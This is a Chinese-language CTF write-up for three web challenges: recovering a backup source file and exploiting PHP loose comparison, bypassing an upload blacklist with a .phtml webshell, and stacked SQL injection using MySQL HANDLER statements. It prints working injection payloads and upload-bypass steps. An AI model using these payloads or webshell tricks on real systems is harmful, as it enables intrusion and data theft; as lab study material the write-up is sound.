[ACTF2020 新生赛]BackupFile && [ACTF2020 新生赛]Upload &&[GYCTF2020]Blacklist
阅读原文时间:2022年04月27日阅读:1

尝试找到源代码,加上题目是备份文件,猜测备份文件里面有网站的源代码,御剑扫描一下,就扫到index.php

访问index.php.bak

下载源代码:

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}

  需要GET方法传入key值,并且key使用有漏洞的is_numeric函数进行判断是否是数字,接着与$str进行比较,$str是一串字母和数字的字母串

可以注意到比较的时候使用的是==,弱类型比较。在比较的过程中因为$key是数字,所以str也会被隐性地转换成整型,即123

所以我们输入$key=123就可以了

点击小灯泡发现文件上传的位置

上传chopper.php,发现被拦截了

修改后缀名上传并抓包,改回php后缀

使用00截断之后发现上传文件名是后缀名

尝试后缀名大小写绕过之后,好像文件没有正确解析

猜测后端应该是黑名单过滤,但是解析的时候有的又会出现问题

用一些不常见的后缀如.phtml,成功上马并连接

在根目录下找到flag

这种题目在强网杯的随便注里面出现过,我们使用1'||1--+列出当前表的所有内容

输入一个select看看过滤条件

相比较于强网杯--随便注过滤的东西更多了

同样,select,和 . 被过滤了,在这种情况下想要跨表查询是很困难的,我们想到使用堆叠注入

参考自:https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#%E9%9A%8F%E4%BE%BF%E6%B3%A8

原来的payload是这样的:

payload = "0';set @s=concat(%s);PREPARE a FROM @s;EXECUTE a;"

但是set 和prepare被过滤

在强网杯随便注中的另外一种绕过方式,是修改表名来偷天换日,但是这里也将alter和rename进行了过滤,禁止了这种方式

这里使用另外一种堆叠注入的奇技淫巧,看MySQL官方文档:https://dev.mysql.com/doc/refman/8.0/en/handler.html

该HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问。该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭 。

  因为HEANDLER … OPEN 打开一个表 ,所以 我们先查看有哪些表

?inject=1%27%20%20;%20show%20tables--+

  

有一个FlagHere的表

在官方示例中,打开了数据表之后,是这样读取数据的

我们使用FIRST读取第一条数据,最后的payload为:

?inject=1%27;HANDLER%20FlagHere%20OPEN;HANDLER%20FlagHere%20READ%20FIRST;HANDLER%20FlagHere%20CLOSE;#

  又学习到了一个知识点

参考博客:

https://www.cnblogs.com/gaonuoqi/p/12398554.html

https://skysec.top/2019/05/25/2019-%E5%BC%BA%E7%BD%91%E6%9D%AFonline-Web-Writeup/#%E9%9A%8F%E4%BE%BF%E6%B3%A8